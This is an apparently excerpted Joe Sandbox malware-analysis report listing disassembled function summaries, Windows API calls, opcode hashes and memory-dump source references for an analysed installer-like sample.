                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$CurrentEnumWindows
                                                                              • String ID:
                                                                              • API String ID: 2396873506-0
                                                                              • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                              • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                              • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                              • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                              APIs
                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastMove
                                                                              • String ID:
                                                                              • API String ID: 55378915-0
                                                                              • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                              • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                              • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                              • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1375471231-0
                                                                              • Opcode ID: 6f9ba9aa6754c9e5f92aa980ec9340f602ab7068810135e8d813bbe39961caa9
                                                                              • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                              • Opcode Fuzzy Hash: 6f9ba9aa6754c9e5f92aa980ec9340f602ab7068810135e8d813bbe39961caa9
                                                                              • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                              APIs
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                              • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CursorLoad
                                                                              • String ID:
                                                                              • API String ID: 3238433803-0
                                                                              • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                              • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                              • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                              • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLibraryLoadMode
                                                                              • String ID:
                                                                              • API String ID: 2987862817-0
                                                                              • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                              • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                              • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                              • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                              APIs
                                                                              • SHGetKnownFolderPath.SHELL32(00499D2C,00008000,00000000,?), ref: 0047C38B
                                                                              • CoTaskMemFree.OLE32(?,0047C3CE), ref: 0047C3C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FolderFreeKnownPathTask
                                                                              • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                              • API String ID: 969438705-544719455
                                                                              • Opcode ID: f6c6a059b63e4d54008f1ffce5751a4521167e095c9041d7631769de42763c2c
                                                                              • Instruction ID: 7faaca218829a84c9f3570f99a5fa1a3454177a5e5567d2e8256f64c4bc7b3ab
                                                                              • Opcode Fuzzy Hash: f6c6a059b63e4d54008f1ffce5751a4521167e095c9041d7631769de42763c2c
                                                                              • Instruction Fuzzy Hash: 77E09B31340604AFEB219B619C92B6D77ACE744B00B718477F900E26C0D67CAD14991C
                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046FFBD,?,00000000), ref: 0045090E
                                                                              • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046FFBD,?,00000000), ref: 00450916
                                                                                • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,0049799C,00000001,00000000,00000002,00000000,00497AFD,?,?,00000005,00000000,00497B31), ref: 004506B7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FilePointer
                                                                              • String ID:
                                                                              • API String ID: 1156039329-0
                                                                              • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                              • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
                                                                              • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                              • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocLock
                                                                              • String ID:
                                                                              • API String ID: 15508794-0
                                                                              • Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                              • Instruction ID: 06179efae1cd4c7c45065c0f91b58358bdd8bb936cab03a6fa385f12497be06a
                                                                              • Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                              • Instruction Fuzzy Hash: 3E9002C4D10B00B8DC0072B20C1AD3F146CD8C172D3D0486F7004B61C3883C88004839
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$AllocFree
                                                                              • String ID:
                                                                              • API String ID: 2087232378-0
                                                                              • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                              • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                              • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                              • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                              APIs
                                                                              • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: DefaultInfoLoadLocaleStringSystem
                                                                              • String ID:
                                                                              • API String ID: 1658689577-0
                                                                              • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                              • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                              • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                              • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                              APIs
                                                                              • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: InfoScroll
                                                                              • String ID:
                                                                              • API String ID: 629608716-0
                                                                              • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                              • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                              • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                              • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                              APIs
                                                                                • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                              • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C322,?,00000000,?,?,0046C534,?,00000000,0046C5A8), ref: 0046C306
                                                                                • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                              • String ID:
                                                                              • API String ID: 3319771486-0
                                                                              • Opcode ID: 372a16360b70271e3fbe54b3c8c2dd1bf1f72266d056807abca4c83ddb60c27c
                                                                              • Instruction ID: ca087fa44df162080e90021c0b7c07397410ce2cdc620b11c20c1b42f9b7769a
                                                                              • Opcode Fuzzy Hash: 372a16360b70271e3fbe54b3c8c2dd1bf1f72266d056807abca4c83ddb60c27c
                                                                              • Instruction Fuzzy Hash: 93F0B470204300BFEB059FA6ED96B2576D8D748714FA1443BF904C6290E57D5880852E
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                              • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                              • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                              • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                              APIs
                                                                              • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateWindow
                                                                              • String ID:
                                                                              • API String ID: 716092398-0
                                                                              • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                              • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                              • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                              • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                              • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                              • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                              • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                              • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                              • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                              • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                              • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                              • Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                              • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                              APIs
                                                                              • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FormatMessage
                                                                              • String ID:
                                                                              • API String ID: 1306739567-0
                                                                              • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                              • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                              • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                              • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                              APIs
                                                                              • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
